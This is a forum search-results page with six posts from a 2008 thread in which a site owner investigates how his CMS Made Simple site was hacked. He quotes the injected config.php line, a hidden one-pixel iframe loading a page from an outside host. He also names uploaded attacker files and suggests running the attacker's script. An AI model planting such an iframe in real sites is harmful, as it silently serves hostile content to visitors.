Search found 6 matches

by HeinzVoerbakje
Thu Mar 20, 2008 8:44 am
Forum: General Discussion
Topic: Site hacked (config.php), how come?
Replies: 18
Views: 8686

Re: Site hacked (config.php), how come?

The stupid thing is I need the upload folder to be executable as the stylesheet I use is located there (/uploads/images/templates). So I just made the upload folder read-execute, so no one can drop any stuff there. The downside of that is that I need to change permission every time I upload a pictur...
by HeinzVoerbakje
Wed Mar 19, 2008 10:07 pm
Forum: General Discussion
Topic: Site hacked (config.php), how come?
Replies: 18
Views: 8686

Re: Site hacked (config.php), how come?

@larry:

Just install it in some safe place, and run it! It will ask for a pwd, but you can simply remove that from the code.
by HeinzVoerbakje
Wed Mar 19, 2008 11:57 am
Forum: General Discussion
Topic: Site hacked (config.php), how come?
Replies: 18
Views: 8686

Re: Site hacked (config.php), how come?

For anyone interested, these are the files he used, see attachment (I changed the php to txt). It appears the script creates a new user somehow....
by HeinzVoerbakje
Wed Mar 19, 2008 10:06 am
Forum: General Discussion
Topic: Site hacked (config.php), how come?
Replies: 18
Views: 8686

Re: Site hacked (config.php), how come?

Ok, reading the logs it was done by 212.96.213.210

Using user 'test' ??? (WTF?), who also uploaded two files (dst2.php and image.php) in /uploads/images

Better dig a little deeper still.
by HeinzVoerbakje
Wed Mar 19, 2008 9:41 am
Forum: General Discussion
Topic: Site hacked (config.php), how come?
Replies: 18
Views: 8686

Re: Site hacked (config.php), how come?

Can you confirm the permissions set on your config file? Secondly, I would be talking to my host; if this is a shared hosting environment, someone else on the same server may have accessed this file. It would be a good idea to be looking at your access logs to find out who changed it. -rw-rw-rw-  c...
by HeinzVoerbakje
Wed Mar 19, 2008 9:18 am
Forum: General Discussion
Topic: Site hacked (config.php), how come?
Replies: 18
Views: 8686

Site hacked (config.php), how come?

Hi all, my website, running CMS Made Simple 1.2.3, has been hacked; the following lines have been injected into config.php just after the <?php in the root of the site: echo '<__iframe src="http://acdedblshd.com/dl/adv530.php" width=1 height=1></__iframe>'; The code points to a site running...
